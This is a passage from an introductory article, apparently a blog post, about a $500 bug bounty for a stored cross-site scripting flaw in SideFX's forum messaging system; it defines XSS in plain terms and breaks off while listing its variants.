In web security, a single tiny bug can cause big trouble. Imagine sending a friendly message on a forum and that message quietly turns into a tool that steals logins. It happened for real on SideFX the community hub for Houdini users. A researcher calling themself itriedallthenamess reported a Stored Cross-Site Scripting (XSS) vulnerability in SideFX’s messaging system. The reward: $500. Not bad for spotting something dangerous.

Don’t worry if you’re new to cybersecurity. This article explains what happened, why it mattered, and how you can find similar bugs yourself. By the end you should feel ready to try bug hunting responsibly.

What is Stored XSS? A Simple Breakdown

XSS (Cross-Site Scripting) is when an attacker sneaks malicious code into a website so that the code runs in other users’ browsers. Think of it as slipping a fake note into a mailbox that explodes when opened.

There are a few flavors:

• Reflected XSS the payload bounces back immediately (you click a bad link).
• DOM-based XSS client-side code mishandles data and runs the payload.